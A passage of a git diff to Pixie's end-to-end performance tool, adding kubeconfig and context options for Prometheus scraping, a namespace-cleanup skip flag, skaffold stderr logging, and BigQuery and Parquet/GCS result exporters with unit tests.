iNdEx = postIndex + case 8: + if wireType != 2 { + return fmt.Errorf("proto: wrong wireType = %d for field KubeContext", wireType) + } + var stringLen uint64 + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return ErrIntOverflowExperiment + } + if iNdEx >= l { + return io.ErrUnexpectedEOF + } + b := dAtA[iNdEx] + iNdEx++ + stringLen |= uint64(b&0x7F) << shift + if b < 0x80 { + break + } + } + intStringLen := int(stringLen) + if intStringLen < 0 { + return ErrInvalidLengthExperiment + } + postIndex := iNdEx + intStringLen + if postIndex < 0 { + return ErrInvalidLengthExperiment + } + if postIndex > l { + return io.ErrUnexpectedEOF + } + m.KubeContext = string(dAtA[iNdEx:postIndex]) + iNdEx = postIndex + case 9: + if wireType != 2 { + return fmt.Errorf("proto: wrong wireType = %d for field Name", wireType) + } + var stringLen uint64 + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return ErrIntOverflowExperiment + } + if iNdEx >= l { + return io.ErrUnexpectedEOF + } + b := dAtA[iNdEx] + iNdEx++ + stringLen |= uint64(b&0x7F) << shift + if b < 0x80 { + break + } + } + intStringLen := int(stringLen) + if intStringLen < 0 { + return ErrInvalidLengthExperiment + } + postIndex := iNdEx + intStringLen + if postIndex < 0 { + return ErrInvalidLengthExperiment + } + if postIndex > l { + return io.ErrUnexpectedEOF + } + m.Name = string(dAtA[iNdEx:postIndex]) + iNdEx = postIndex default: iNdEx = preIndex skippy, err := skipExperiment(dAtA[iNdEx:]) diff --git a/src/e2e_test/perf_tool/experimentpb/experiment.proto b/src/e2e_test/perf_tool/experimentpb/experiment.proto index d5482d5d249..ed9dce28339 100644 --- a/src/e2e_test/perf_tool/experimentpb/experiment.proto +++ b/src/e2e_test/perf_tool/experimentpb/experiment.proto @@ -124,6 +124,11 @@ message PatchTarget { message PrerenderedDeploy { repeated string yaml_paths = 1 [ (gogoproto.customname) = "YAMLPaths" ]; repeated PatchSpec patches = 2; + // If true, the step will not return the deployed namespace in its cleanup list, + // so workload.Close() will not delete that namespace on teardown. Use this for + // resources applied into namespaces the experiment does not own (e.g. a + // RoleBinding in kube-system that has to live there for API aggregation auth). + bool skip_namespace_delete = 3; } // SkaffoldDeploy specifies how to use skaffold to deploy a component. SkaffoldDeploy is currently @@ -220,6 +225,15 @@ message PrometheusScrapeSpec { // How often to scrape the matched pods. google.protobuf.Duration scrape_period = 5; map metric_names = 6; + // Optional path to a kubeconfig file for connecting to a different cluster. + // If empty, the experiment's default cluster context is used. + string kubeconfig_path = 7; + // Optional kubectl context name to use within the kubeconfig. + // If empty, the current-context from the kubeconfig is used. + string kube_context = 8; + // Identifier for this prometheus recorder, used by the CLI to target + // recorders with kubeconfig/kube_context overrides at runtime. + string name = 9; } // ClusterSpec specifies the type and size of cluster an experiment should run on. diff --git a/src/e2e_test/perf_tool/pkg/cluster/context.go b/src/e2e_test/perf_tool/pkg/cluster/context.go index bd79bf433f3..c274a6726b0 100644 --- a/src/e2e_test/perf_tool/pkg/cluster/context.go +++ b/src/e2e_test/perf_tool/pkg/cluster/context.go @@ -53,6 +53,36 @@ func NewContextFromPath(kubeconfigPath string) (*Context, error) { }, nil } +// NewContextFromOptions creates a new Context using the specified kubeconfig path and/or context name. +// If kubeconfigPath is empty, the default kubeconfig path is used. +// If kubeContext is empty, the current-context from the kubeconfig is used. +func NewContextFromOptions(kubeconfigPath string, kubeContext string) (*Context, error) { + loadingRules := &clientcmd.ClientConfigLoadingRules{} + if kubeconfigPath != "" { + loadingRules.ExplicitPath = kubeconfigPath + } else { + loadingRules = clientcmd.NewDefaultClientConfigLoadingRules() + } + overrides := &clientcmd.ConfigOverrides{} + if kubeContext != "" { + overrides.CurrentContext = kubeContext + } + config := clientcmd.NewNonInteractiveDeferredLoadingClientConfig(loadingRules, overrides) + restConfig, err := config.ClientConfig() + if err != nil { + return nil, err + } + if kubeconfigPath == "" { + kubeconfigPath = clientcmd.RecommendedHomeFile + } + clientset := k8s.GetClientset(restConfig) + return &Context{ + configPath: kubeconfigPath, + restConfig: restConfig, + clientset: clientset, + }, nil +} + // NewContextFromConfig writes the given kubeconfig to a file, and the returns NewContextFromPath for that file. func NewContextFromConfig(kubeconfig []byte) (*Context, error) { tmpFile, err := os.CreateTemp("", "*") diff --git a/src/e2e_test/perf_tool/pkg/deploy/checks/BUILD.bazel b/src/e2e_test/perf_tool/pkg/deploy/checks/BUILD.bazel index 22c706e9bee..a4205b00b8c 100644 --- a/src/e2e_test/perf_tool/pkg/deploy/checks/BUILD.bazel +++ b/src/e2e_test/perf_tool/pkg/deploy/checks/BUILD.bazel @@ -34,6 +34,7 @@ go_library( "//src/e2e_test/perf_tool/pkg/pixie", "@com_github_cenkalti_backoff_v4//:backoff", "@com_github_sirupsen_logrus//:logrus", + "@io_k8s_api//core/v1:core", "@io_k8s_apimachinery//pkg/apis/meta/v1:meta", ], ) diff --git a/src/e2e_test/perf_tool/pkg/deploy/checks/k8s_healthcheck.go b/src/e2e_test/perf_tool/pkg/deploy/checks/k8s_healthcheck.go index fda494dc839..08363f43abe 100644 --- a/src/e2e_test/perf_tool/pkg/deploy/checks/k8s_healthcheck.go +++ b/src/e2e_test/perf_tool/pkg/deploy/checks/k8s_healthcheck.go @@ -25,6 +25,7 @@ import ( "github.com/cenkalti/backoff/v4" log "github.com/sirupsen/logrus" + v1 "k8s.io/api/core/v1" metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" "px.dev/pixie/src/e2e_test/perf_tool/experimentpb" @@ -68,6 +69,15 @@ func (hc *k8sHealthCheck) Wait(ctx context.Context, clusterCtx *cluster.Context, ) } for _, pod := range pl.Items { + // CronJob pods that exited 0 stay around in phase Succeeded + // (Kubernetes keeps them per successfulJobsHistoryLimit) and + // their containers report Ready: false forever. They are + // "done", not "not ready" — skip. Phase Failed is intentionally + // NOT skipped: a failed CronJob run is a real signal we want + // the healthcheck to surface, not paper over. + if pod.Status.Phase == v1.PodSucceeded { + continue + } for _, cs := range pod.Status.InitContainerStatuses { if cs.State.Terminated == nil { return fmt.Errorf( diff --git a/src/e2e_test/perf_tool/pkg/deploy/steps/prerendered.go b/src/e2e_test/perf_tool/pkg/deploy/steps/prerendered.go index a05960b6de2..ca7dbf6ef3e 100644 --- a/src/e2e_test/perf_tool/pkg/deploy/steps/prerendered.go +++ b/src/e2e_test/perf_tool/pkg/deploy/steps/prerendered.go @@ -75,6 +75,9 @@ func (p *prerenderedDeployImpl) Deploy(clusterCtx *cluster.Context) ([]string, e if err := p.r.deploy(clusterCtx); err != nil { return nil, err } + if p.spec.SkipNamespaceDelete { + return nil, nil + } ns, err := p.r.getNamespace() if err != nil { return nil, err diff --git a/src/e2e_test/perf_tool/pkg/deploy/steps/skaffold.go b/src/e2e_test/perf_tool/pkg/deploy/steps/skaffold.go index edbac73a2ef..3216d73d009 100644 --- a/src/e2e_test/perf_tool/pkg/deploy/steps/skaffold.go +++ b/src/e2e_test/perf_tool/pkg/deploy/steps/skaffold.go @@ -21,6 +21,7 @@ package steps import ( "bytes" "fmt" + "io" "os" "os/exec" "strings" @@ -34,6 +35,7 @@ import ( type skaffoldDeployImpl struct { spec *experimentpb.SkaffoldDeploy containerRegistryRepo string + stderrFile string r *renderedYAML } @@ -41,10 +43,13 @@ type skaffoldDeployImpl struct { var _ DeployStep = &skaffoldDeployImpl{} // NewSkaffoldDeploy returns a new DeployStep which deploys a stage of a workload using skaffold. -func NewSkaffoldDeploy(spec *experimentpb.SkaffoldDeploy, containerRegistryRepo string) DeployStep { +// If stderrFile is non-empty, skaffold's stderr is appended to that file in addition to +// the perf_tool process's stderr. +func NewSkaffoldDeploy(spec *experimentpb.SkaffoldDeploy, containerRegistryRepo, stderrFile string) DeployStep { return &skaffoldDeployImpl{ spec: spec, containerRegistryRepo: containerRegistryRepo, + stderrFile: stderrFile, } } @@ -85,6 +90,21 @@ func (s *skaffoldDeployImpl) Deploy(clusterCtx *cluster.Context) ([]string, erro return []string{ns}, nil } +// stderrSink returns the io.Writer to use for skaffold's stderr and a cleanup +// func. When stderrFile is set, output is teed to both os.Stderr and the file +// (opened in append mode so multiple skaffold invocations all land in the same +// log). +func (s *skaffoldDeployImpl) stderrSink() (io.Writer, func(), error) { + if s.stderrFile == "" { + return os.Stderr, func() {}, nil + } + f, err := os.OpenFile(s.stderrFile, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return nil, nil, fmt.Errorf("failed to open skaffold stderr file %q: %w", s.stderrFile, err) + } + return io.MultiWriter(os.Stderr, f), func() { f.Close() }, nil +} + func (s *skaffoldDeployImpl) runSkaffoldBuild() ([]byte, error) { var buildArtifacts bytes.Buffer buildArgs := []string{ @@ -95,8 +115,13 @@ func (s *skaffoldDeployImpl) runSkaffoldBuild() ([]byte, error) { } buildArgs = append(buildArgs, s.spec.SkaffoldArgs...) log.Tracef("Running `skaffold %s` ...", strings.Join(buildArgs, " ")) + stderr, cleanup, err := s.stderrSink() + if err != nil { + return nil, err + } + defer cleanup() cmd := exec.Command("skaffold", buildArgs...) - cmd.Stderr = os.Stderr + cmd.Stderr = stderr cmd.Stdout = &buildArtifacts if err := cmd.Run(); err != nil { return nil, fmt.Errorf("failed to run `skaffold %s`: %w", strings.Join(buildArgs, " "), err) @@ -114,9 +139,14 @@ func (s *skaffoldDeployImpl) runSkaffoldRender(buildArtifacts []byte) ([]byte, e } renderArgs = append(renderArgs, s.spec.SkaffoldArgs...) log.Tracef("Running `skaffold %s` ...", strings.Join(renderArgs, " ")) + stderr, cleanup, err := s.stderrSink() + if err != nil { + return nil, err + } + defer cleanup() cmd := exec.Command("skaffold", renderArgs...) cmd.Stdin = bytes.NewReader(buildArtifacts) - cmd.Stderr = os.Stderr + cmd.Stderr = stderr cmd.Stdout = &renderedYAMLs if err := cmd.Run(); err != nil { return nil, fmt.Errorf("failed to run `skaffold %s`: %w", strings.Join(renderArgs, " "), err) diff --git a/src/e2e_test/perf_tool/pkg/deploy/workload.go b/src/e2e_test/perf_tool/pkg/deploy/workload.go index ef1e1fc8170..9b09d28c619 100644 --- a/src/e2e_test/perf_tool/pkg/deploy/workload.go +++ b/src/e2e_test/perf_tool/pkg/deploy/workload.go @@ -54,14 +54,17 @@ type workloadImpl struct { } // NewWorkload creates a new Workload capable of deploying according to the spec given. -func NewWorkload(pxCtx *pixie.Context, containerRegistryRepo string, spec *experimentpb.WorkloadSpec) (Workload, error) { +// skaffoldStderrFile, when non-empty, is the path to which skaffold's stderr is appended +// for any skaffold-based deploy steps; pass "" to leave skaffold's stderr going only to +// the perf_tool process's stderr. +func NewWorkload(pxCtx *pixie.Context, containerRegistryRepo, skaffoldStderrFile string, spec *experimentpb.WorkloadSpec) (Workload, error) { deploySteps := make([]steps.DeployStep, len(spec.DeploySteps)) for i, stepSpec := range spec.DeploySteps { switch stepSpec.DeployType.(type) { case *experimentpb.DeployStep_Prerendered: deploySteps[i] = steps.NewPrerenderedDeploy(stepSpec.GetPrerendered()) case *experimentpb.DeployStep_Skaffold: - deploySteps[i] = steps.NewSkaffoldDeploy(stepSpec.GetSkaffold(), containerRegistryRepo) + deploySteps[i] = steps.NewSkaffoldDeploy(stepSpec.GetSkaffold(), containerRegistryRepo, skaffoldStderrFile) case *experimentpb.DeployStep_Px: deploySteps[i] = steps.NewPxDeploy(pxCtx, stepSpec.GetPx()) } diff --git a/src/e2e_test/perf_tool/pkg/exporter/BUILD.bazel b/src/e2e_test/perf_tool/pkg/exporter/BUILD.bazel new file mode 100644 index 00000000000..17b1fe7c417 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/exporter/BUILD.bazel @@ -0,0 +1,50 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "exporter", + srcs = [ + "bq_exporter.go", + "exporter.go", + "parquet_exporter.go", + ], + importpath = "px.dev/pixie/src/e2e_test/perf_tool/pkg/exporter", + visibility = ["//visibility:public"], + deps = [ + "//src/e2e_test/perf_tool/pkg/metrics", + "//src/shared/bq", + "@com_github_gofrs_uuid//:uuid", + "@com_github_parquet_go_parquet_go//:parquet-go", + "@com_github_sirupsen_logrus//:logrus", + "@com_google_cloud_go_storage//:storage", + ], +) + +pl_go_test( + name = "exporter_test", + srcs = ["parquet_exporter_test.go"], + embed = [":exporter"], + deps = [ + "//src/e2e_test/perf_tool/pkg/metrics", + "@com_github_gofrs_uuid//:uuid", + "@com_github_parquet_go_parquet_go//:parquet-go", + "@com_github_stretchr_testify//assert", + "@com_github_stretchr_testify//require", + ], +) diff --git a/src/e2e_test/perf_tool/pkg/run/row.go b/src/e2e_test/perf_tool/pkg/exporter/bq_exporter.go similarity index 58% rename from src/e2e_test/perf_tool/pkg/run/row.go rename to src/e2e_test/perf_tool/pkg/exporter/bq_exporter.go index 17959d97d78..023db03c4f4 100644 --- a/src/e2e_test/perf_tool/pkg/run/row.go +++ b/src/e2e_test/perf_tool/pkg/exporter/bq_exporter.go @@ -16,15 +16,18 @@ * SPDX-License-Identifier: Apache-2.0 */ -package run +package exporter import ( + "context" "encoding/json" "time" "github.com/gofrs/uuid" + log "github.com/sirupsen/logrus" "px.dev/pixie/src/e2e_test/perf_tool/pkg/metrics" + "px.dev/pixie/src/shared/bq" ) // ResultRow represents a single datapoint for a single metric, to be stored in bigquery. @@ -51,7 +54,7 @@ type SpecRow struct { CommitTopoOrder int `bigquery:"commit_topo_order"` } -// MetricsRowToResultRow converts a `metrics.ResultRow` into a `bq.ResultRow`. +// MetricsRowToResultRow converts a `metrics.ResultRow` into a `ResultRow`. func MetricsRowToResultRow(expID uuid.UUID, row *metrics.ResultRow) (*ResultRow, error) { encodedTags, err := json.Marshal(row.Tags) if err != nil { @@ -65,3 +68,61 @@ func MetricsRowToResultRow(expID uuid.UUID, row *metrics.ResultRow) (*ResultRow, Tags: string(encodedTags), }, nil } + +// BQExporter exports experiment results and specs to BigQuery. +type BQExporter struct { + resultTable *bq.Table + specTable *bq.Table +} + +// NewBQExporter creates a new BigQuery exporter. +func NewBQExporter(resultTable, specTable *bq.Table) *BQExporter { + return &BQExporter{ + resultTable: resultTable, + specTable: specTable, + } +} + +// ExportResults consumes metrics from resultCh and inserts them into BigQuery in batches. +func (e *BQExporter) ExportResults(ctx context.Context, expID uuid.UUID, resultCh <-chan *metrics.ResultRow) error { + bqCh := make(chan interface{}) + defer close(bqCh) + + inserter := &bq.BatchInserter{ + Table: e.resultTable, + BatchSize: 512, + PushTimeout: 2 * time.Minute, + } + go inserter.Run(bqCh) + + for row := range resultCh { + bqRow, err := MetricsRowToResultRow(expID, row) + if err != nil { + log.WithError(err).Error("Failed to convert result row") + continue + } + bqCh <- bqRow + } + return nil +} + +// ExportSpec writes the experiment spec to BigQuery on experiment success. +func (e *BQExporter) ExportSpec(ctx context.Context, expID uuid.UUID, encodedSpec string, commitTopoOrder int) error { + specRow := &SpecRow{ + ExperimentID: expID.String(), + Spec: encodedSpec, + CommitTopoOrder: commitTopoOrder, + } + + inserter := e.specTable.Inserter() + inserter.SkipInvalidRows = false + + putCtx, cancel := context.WithTimeout(ctx, 5*time.Minute) + defer cancel() + return inserter.Put(putCtx, specRow) +} + +// Close is a no-op for the BigQuery exporter. +func (e *BQExporter) Close() error { + return nil +} diff --git a/src/e2e_test/perf_tool/pkg/exporter/exporter.go b/src/e2e_test/perf_tool/pkg/exporter/exporter.go new file mode 100644 index 00000000000..c89d6898032 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/exporter/exporter.go @@ -0,0 +1,37 @@ +/* + * Copyright 2018- The Pixie Authors. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + * SPDX-License-Identifier: Apache-2.0 + */ + +package exporter + +import ( + "context" + + "github.com/gofrs/uuid" + + "px.dev/pixie/src/e2e_test/perf_tool/pkg/metrics" +) + +// Exporter handles exporting experiment results and specs to a storage backend. +type Exporter interface { + // ExportResults consumes metrics from resultCh until it closes, then flushes. + ExportResults(ctx context.Context, expID uuid.UUID, resultCh <-chan *metrics.ResultRow) error + // ExportSpec writes the experiment spec for a successful experiment. + ExportSpec(ctx context.Context, expID uuid.UUID, encodedSpec string, commitTopoOrder int) error + // Close releases any resources held by the exporter. + Close() error +} diff --git a/src/e2e_test/perf_tool/pkg/exporter/parquet_exporter.go b/src/e2e_test/perf_tool/pkg/exporter/parquet_exporter.go new file mode 100644 index 00000000000..c5fe259e93a --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/exporter/parquet_exporter.go @@ -0,0 +1,285 @@ +/* + * Copyright 2018- The Pixie Authors. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + * SPDX-License-Identifier: Apache-2.0 + */ + +package exporter + +import ( + "context" + "fmt" + "io" + "os" + "sort" + "time" + + "cloud.google.com/go/storage" + "github.com/gofrs/uuid" + "github.com/parquet-go/parquet-go" + log "github.com/sirupsen/logrus" + + "px.dev/pixie/src/e2e_test/perf_tool/pkg/metrics" +) + +type bufferedRow struct { + ExperimentID string + Timestamp time.Time + Name string + Value float64 + Tags map[string]string +} + +// uploadFunc is the signature for uploading a local file to a remote path. +type uploadFunc func(ctx context.Context, objectPath string, localPath string) error + +// ParquetGCSExporter exports experiment results as parquet files to GCS. +type ParquetGCSExporter struct { + bucket string + prefix string + batchSize int + gcsClient *storage.Client + upload uploadFunc +} + +// NewParquetGCSExporter creates a new Parquet+GCS exporter. +func NewParquetGCSExporter(ctx context.Context, bucket, prefix string, batchSize int) (*ParquetGCSExporter, error) { + client, err := storage.NewClient(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create GCS client: %w", err) + } + e := &ParquetGCSExporter{ + bucket: bucket, + prefix: prefix, + batchSize: batchSize, + gcsClient: client, + } + e.upload = e.uploadToGCS + return e, nil +} + +// ExportResults consumes metrics from resultCh and writes them as batched parquet files to GCS. +func (e *ParquetGCSExporter) ExportResults(ctx context.Context, expID uuid.UUID, resultCh <-chan *metrics.ResultRow) error { + now := time.Now() + basePath := e.gcsPath(now, expID) + seqNum := 0 + batch := make([]bufferedRow, 0, e.batchSize) + + for row := range resultCh { + batch = append(batch, bufferedRow{ + ExperimentID: expID.String(), + Timestamp: row.Timestamp, + Name: row.Name, + Value: row.Value, + Tags: row.Tags, + }) + if len(batch) >= e.batchSize { + if err := e.flushBatch(ctx, basePath, seqNum, batch); err != nil { + return err + } + seqNum++ + batch = batch[:0] + } + } + + if len(batch) > 0 { + if err := e.flushBatch(ctx, basePath, seqNum, batch); err != nil { + return err + } + } + return nil +} + +// ExportSpec writes the experiment spec as a parquet file to GCS. +func (e *ParquetGCSExporter) ExportSpec(ctx context.Context, expID uuid.UUID, encodedSpec string, commitTopoOrder int) error { + type specRow struct { + ExperimentID string `parquet:"experiment_id"` + Spec string `parquet:"spec"` + CommitTopoOrder int64 `parquet:"commit_topo_order"` + } + + tmpFile, err := os.CreateTemp("", "spec-*.parquet") + if err != nil { + return fmt.Errorf("failed to create temp file for spec parquet: %w", err) + } + tmpPath := tmpFile.Name() + defer os.Remove(tmpPath) + + writer := parquet.NewGenericWriter[specRow](tmpFile) + _, err = writer.Write([]specRow{{ + ExperimentID: expID.String(), + Spec: encodedSpec, + CommitTopoOrder: int64(commitTopoOrder), + }}) + if err != nil { + tmpFile.Close() + return fmt.Errorf("failed to write spec parquet: %w", err) + } + if err := writer.Close(); err != nil { + tmpFile.Close() + return fmt.Errorf("failed to close spec parquet writer: %w", err) + } + tmpFile.Close() + + now := time.Now() + gcsPath := fmt.Sprintf("%s/spec.parquet", e.gcsPath(now, expID)) + return e.upload(ctx, gcsPath, tmpPath) +} + +// Close releases resources held by the exporter. +func (e *ParquetGCSExporter) Close() error { + return e.gcsClient.Close() +} + +func (e *ParquetGCSExporter) gcsPath(t time.Time, expID uuid.UUID) string { + datePath := t.Format("2006/01/02") + if e.prefix != "" { + return fmt.Sprintf("%s/%s/%s", e.prefix, datePath, expID.String()) + } + return fmt.Sprintf("%s/%s", datePath, expID.String()) +} + +func (e *ParquetGCSExporter) flushBatch(ctx context.Context, basePath string, seqNum int, rows []bufferedRow) error { + tagKeys := collectTagKeys(rows) + schema := buildResultSchema(tagKeys) + + tmpFile, err := os.CreateTemp("", "results-*.parquet") + if err != nil { + return fmt.Errorf("failed to create temp file for parquet: %w", err) + } + tmpPath := tmpFile.Name() + defer os.Remove(tmpPath) + + writer := parquet.NewWriter(tmpFile, schema) + + for _, row := range rows { + parquetRow := buildResultRow(row, tagKeys) + if _, err := writer.WriteRows([]parquet.Row{parquetRow}); err != nil { + tmpFile.Close() + return fmt.Errorf("failed to write parquet row: %w", err) + } + } + + if err := writer.Close(); err != nil { + tmpFile.Close() + return fmt.Errorf("failed to close parquet writer: %w", err) + } + tmpFile.Close() + + gcsPath := fmt.Sprintf("%s/results_%04d.parquet", basePath, seqNum) + log.WithField("gcs_path", gcsPath).WithField("rows", len(rows)).Info("Uploading parquet batch") + return e.upload(ctx, gcsPath, tmpPath) +} + +func (e *ParquetGCSExporter) uploadToGCS(ctx context.Context, objectPath string, localPath string) error { + f, err := os.Open(localPath) + if err != nil { + return fmt.Errorf("failed to open temp file for upload: %w", err) + } + defer f.Close() + + obj := e.gcsClient.Bucket(e.bucket).Object(objectPath) + wc := obj.NewWriter(ctx) + if _, err := io.Copy(wc, f); err != nil { + wc.Close() + return fmt.Errorf("failed to upload to GCS: %w", err) + } + if err := wc.Close(); err != nil { + return fmt.Errorf("failed to finalize GCS upload: %w", err) + } + return nil +} + +// collectTagKeys returns a sorted list of unique tag keys across all rows. +func collectTagKeys(rows []bufferedRow) []string { + keySet := make(map[string]struct{}) + for _, row := range rows { + for k := range row.Tags { + keySet[k] = struct{}{} + } + } + keys := make([]string, 0, len(keySet)) + for k := range keySet { + keys = append(keys, k) + } + sort.Strings(keys) + return keys +} + +// buildResultSchema creates a parquet schema with fixed columns plus dynamic tag columns. +func buildResultSchema(tagKeys []string) *parquet.Schema { + group := parquet.Group{ + "experiment_id": parquet.String(), + "timestamp": parquet.Timestamp(parquet.Millisecond), + "name": parquet.String(), + "value": parquet.Leaf(parquet.DoubleType), + } + for _, key := range tagKeys { + group["tag_"+key] = parquet.Optional(parquet.String()) + } + return parquet.NewSchema("result", group) +} + +// buildResultRow constructs a parquet.Row from a bufferedRow with the given tag key ordering. +// Column ordering matches the schema's sorted field order (alphabetical by field name). +func buildResultRow(row bufferedRow, tagKeys []string) parquet.Row { + // parquet.Group sorts fields alphabetically. We must produce values in that order. + // Build named values, sort them, then assign column indices. + + type colEntry struct { + name string + val parquet.Value + optional bool + } + + entries := []colEntry{ + {"experiment_id", parquet.ValueOf(row.ExperimentID), false}, + {"name", parquet.ValueOf(row.Name), false}, + {"timestamp", parquet.Int64Value(row.Timestamp.UnixMilli()), false}, + {"value", parquet.ValueOf(row.Value), false}, + } + + for _, key := range tagKeys { + colName := "tag_" + key + if v, ok := row.Tags[key]; ok { + entries = append(entries, colEntry{colName, parquet.ValueOf(v), true}) + } else { + // Null value for missing optional tag. + entries = append(entries, colEntry{colName, parquet.Value{}, true}) + } + } + + // Sort by column name to match schema field order. + sort.Slice(entries, func(i, j int) bool { + return entries[i].name < entries[j].name + }) + + parquetRow := make(parquet.Row, len(entries)) + for i, e := range entries { + if e.optional { + if e.val.IsNull() { + // Null optional: definitionLevel=0 + parquetRow[i] = parquet.Value{}.Level(0, 0, i) + } else { + // Present optional: definitionLevel=1 + parquetRow[i] = e.val.Level(0, 1, i) + } + } else { + // Required: definitionLevel=0 + parquetRow[i] = e.val.Level(0, 0, i) + } + } + return parquetRow +} diff --git a/src/e2e_test/perf_tool/pkg/exporter/parquet_exporter_test.go b/src/e2e_test/perf_tool/pkg/exporter/parquet_exporter_test.go new file mode 100644 index 00000000000..e20816bfd5b --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/exporter/parquet_exporter_test.go @@ -0,0 +1,500 @@ +/* + * Copyright 2018- The Pixie Authors. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + * SPDX-License-Identifier: Apache-2.0 + */ + +package exporter + +import ( + "context" + "errors" + "fmt" + "io" + "os" + "path/filepath" + "sort" + "strings" + "testing" + "time" + + "github.com/gofrs/uuid" + "github.com/parquet-go/parquet-go" + "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" + + "px.dev/pixie/src/e2e_test/perf_tool/pkg/metrics" +) + +func TestCollectTagKeys(t *testing.T) { + rows := []bufferedRow{ + {Tags: map[string]string{"pod": "pod-1", "node_name": "node-1"}}, + {Tags: map[string]string{"pod": "pod-2", "instance": "inst-1"}}, + {Tags: map[string]string{}}, + } + + keys := collectTagKeys(rows) + + assert.Equal(t, []string{"instance", "node_name", "pod"}, keys) +} + +func TestCollectTagKeys_Empty(t *testing.T) { + rows := []bufferedRow{ + {Tags: map[string]string{}}, + } + + keys := collectTagKeys(rows) + + assert.Empty(t, keys) +} + +func TestBuildResultSchema(t *testing.T) { + tagKeys := []string{"node_name", "pod"} + + schema := buildResultSchema(tagKeys) + + fields := schema.Fields() + fieldNames := make([]string, len(fields)) + for i, f := range fields { + fieldNames[i] = f.Name() + } + sort.Strings(fieldNames) + + assert.Equal(t, []string{ + "experiment_id", + "name", + "tag_node_name", + "tag_pod", + "timestamp", + "value", + }, fieldNames) +} + +func TestBuildResultRow_AllTagsPresent(t *testing.T) { + ts := time.Date(2026, 4, 15, 10, 30, 0, 0, time.UTC) + row := bufferedRow{ + ExperimentID: "test-id", + Timestamp: ts, + Name: "cpu_usage", + Value: 42.5, + Tags: map[string]string{"pod": "pod-1", "node_name": "node-1"}, + } + tagKeys := []string{"node_name", "pod"} + + parquetRow := buildResultRow(row, tagKeys) + + // Schema sorts fields alphabetically: + // experiment_id, name, tag_node_name, tag_pod, timestamp, value + assert.Equal(t, 6, len(parquetRow)) + + // Verify column indices are sequential. + for i, v := range parquetRow { + assert.Equal(t, i, v.Column(), "column index mismatch at position %d", i) + } +} + +func TestBuildResultRow_MissingTag(t *testing.T) { + ts := time.Date(2026, 4, 15, 10, 30, 0, 0, time.UTC) + row := bufferedRow{ + ExperimentID: "test-id", + Timestamp: ts, + Name: "rss", + Value: 1024.0, + Tags: map[string]string{"pod": "pod-1"}, + } + tagKeys := []string{"node_name", "pod"} + + parquetRow := buildResultRow(row, tagKeys) + + assert.Equal(t, 6, len(parquetRow)) + + // Find the tag_node_name column (should be null). + // Alphabetical order: experiment_id(0), name(1), tag_node_name(2), tag_pod(3), timestamp(4), value(5) + tagNodeNameVal := parquetRow[2] + assert.True(t, tagNodeNameVal.IsNull(), "missing tag should produce a null value") + assert.Equal(t, 0, tagNodeNameVal.DefinitionLevel(), "null optional field should have definitionLevel=0") + + // tag_pod should be present. + tagPodVal := parquetRow[3] + assert.False(t, tagPodVal.IsNull()) + assert.Equal(t, 1, tagPodVal.DefinitionLevel(), "present optional field should have definitionLevel=1") +} + +func TestFlushBatch_WritesValidParquet(t *testing.T) { + tmpDir := t.TempDir() + var uploadedPath string + + e := &ParquetGCSExporter{ + batchSize: 100, + upload: func(ctx context.Context, objectPath string, localPath string) error { + // Copy the parquet file to our temp dir before it gets cleaned up. + dest := filepath.Join(tmpDir, filepath.Base(objectPath)) + src, err := os.Open(localPath) + if err != nil { + return err + } + defer src.Close() + dst, err := os.Create(dest) + if err != nil { + return err + } + defer dst.Close() + if _, err := io.Copy(dst, src); err != nil { + return err + } + uploadedPath = dest + return nil + }, + } + + ts := time.Date(2026, 4, 15, 12, 0, 0, 0, time.UTC) + rows := []bufferedRow{ + { + ExperimentID: "exp-1", + Timestamp: ts, + Name: "cpu_usage", + Value: 0.85, + Tags: map[string]string{"pod": "kelvin-abc", "node_name": "node-1"}, + }, + { + ExperimentID: "exp-1", + Timestamp: ts.Add(30 * time.Second), + Name: "rss", + Value: 1048576, + Tags: map[string]string{"pod": "kelvin-abc"}, + }, + } + + err := e.flushBatch(context.Background(), "test/path", 0, rows) + require.NoError(t, err) + require.NotEmpty(t, uploadedPath) + + // Read back the parquet file and verify contents. + f, err := os.Open(uploadedPath) + require.NoError(t, err) + defer f.Close() + + stat, err := f.Stat() + require.NoError(t, err) + + pf, err := parquet.OpenFile(f, stat.Size()) + require.NoError(t, err) + + schema := pf.Schema() + assert.Equal(t, 